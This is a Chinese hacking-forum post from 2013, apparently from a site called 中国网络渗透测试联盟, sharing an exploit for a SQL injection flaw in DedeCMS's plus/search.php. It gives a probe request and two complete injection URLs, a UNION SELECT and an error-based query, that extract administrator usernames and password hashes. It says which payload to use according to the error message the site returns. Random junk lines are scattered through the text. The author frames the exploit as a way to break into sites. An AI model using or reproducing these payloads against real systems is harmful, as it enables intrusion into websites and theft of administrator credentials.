中国网络渗透测试联盟
标题:
[通杀]dedecms plus/search.php 注入漏洞利用EXP
[打印本页]
作者:
admin
时间:
2013-1-21 08:45
标题:
[通杀]dedecms plus/search.php 注入漏洞利用EXP
转载不加作者名的没JJ
5 F. N4 F% i0 h7 l
$ O1 R! S! E6 L0 S( F
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
$ p# `$ \2 l# J' |' e+ m
" ]$ X# G" H; q
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
4 V$ K; T8 L( O( u8 _
0 s; S$ c; R/ A; u$ j- k
我一般是这样测试的:
* y8 r3 c! g- u6 j+ e5 X
G1 {7 F, b* r7 r" T+ Y
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
1 c) ^! R9 M# p, o# M$ I; G4 b
- \: L1 Y# |$ s8 l8 J1 w3 \0 v
转载不加作者名的没JJ
; @& U3 R+ X K6 h, S
( s- t- w7 Z' S# Q' _) \
作者:鬼哥
( r M, j0 v8 z" M) u4 x: W6 L
3 N# L' G) I% h, S' A
# I# |$ L! p! s
2 u8 p: B7 L' q8 d1 u" k# u. I
看结果如果提示
* j0 Z& _4 c* T+ q& W0 [' j1 @8 r
) U% i: W: x; f4 D& s) ^) ]
Safe Alert: Request Error step 2 !
9 X0 O+ M1 ]( O6 D3 l
" _; J$ Z: X7 s5 K
那么直接用下面的exp
' F9 Q3 O, X" w
$ R e, s+ [3 T9 ?& R
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
: z+ r) \3 y/ y4 ~
1 ]& D& Q8 Q4 N
, s: ?' |3 v+ a% @
看结果如果提示
+ ]$ K" a) h+ J( Y
7 t9 u6 F1 Y$ J1 ~" T2 D8 [
Safe Alert: Request Error step 1 !
3 y1 r6 ~2 k0 C8 ^7 e# {7 H; \* P
4 l& D6 u! V7 m8 ]6 k7 ]7 P1 {( o
那么直接用下面的exp
# Y6 f( m0 ?' f- X4 R# P! H* I' K
% J% p& R4 S( P
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
) Y H* v$ |% O
7 T3 |6 k+ j9 s% R0 l& y3 a5 F
6 R0 @0 Z) f, D& A' m0 ^8 G! Q0 J
如果正常显示证明漏洞不存在了。
7 F+ Q( i7 I4 n6 u+ ?- z
' ?0 [: Y5 Y/ F2 s8 q
转载不加作者名的没JJ
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2